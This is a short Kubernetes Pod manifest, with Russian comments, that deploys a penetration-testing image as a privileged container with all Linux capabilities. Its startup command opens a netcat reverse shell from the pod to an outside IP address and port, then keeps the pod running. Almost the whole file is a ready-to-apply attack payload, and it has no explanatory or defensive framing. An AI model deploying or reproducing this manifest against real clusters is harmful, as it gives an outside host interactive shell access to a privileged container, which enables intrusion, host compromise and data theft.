apiVersion: v1
kind: Pod
metadata:
  name: mtkpi-pentest-pod
  namespace: default  # или твой namespace
spec:
  containers:
  - name: mtkpi
    image: r0binak/mtkpi:latest  # Полный пентест-образ
    securityContext:
      privileged: true           # Оставляем — раз уже работает
      capabilities:
        add: ["ALL"]             # На всякий случай
    command: ["/bin/sh", "-c"]
    args:
    - |
      # 1. Запускаем reverse shell (как у тебя)
      rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 188.227.84.184 9001 > /tmp/f &
      
      # 2. Держим под живым (sleep infinity)
      echo "[+] Reverse shell запущен на 188.227.84.184:9001"
      echo "[+] MTKPI готов. Доступные инструменты:"
      ls -la /tools 2>/dev/null || echo "Tools в /bin, /usr/local/bin"
      sleep infinity
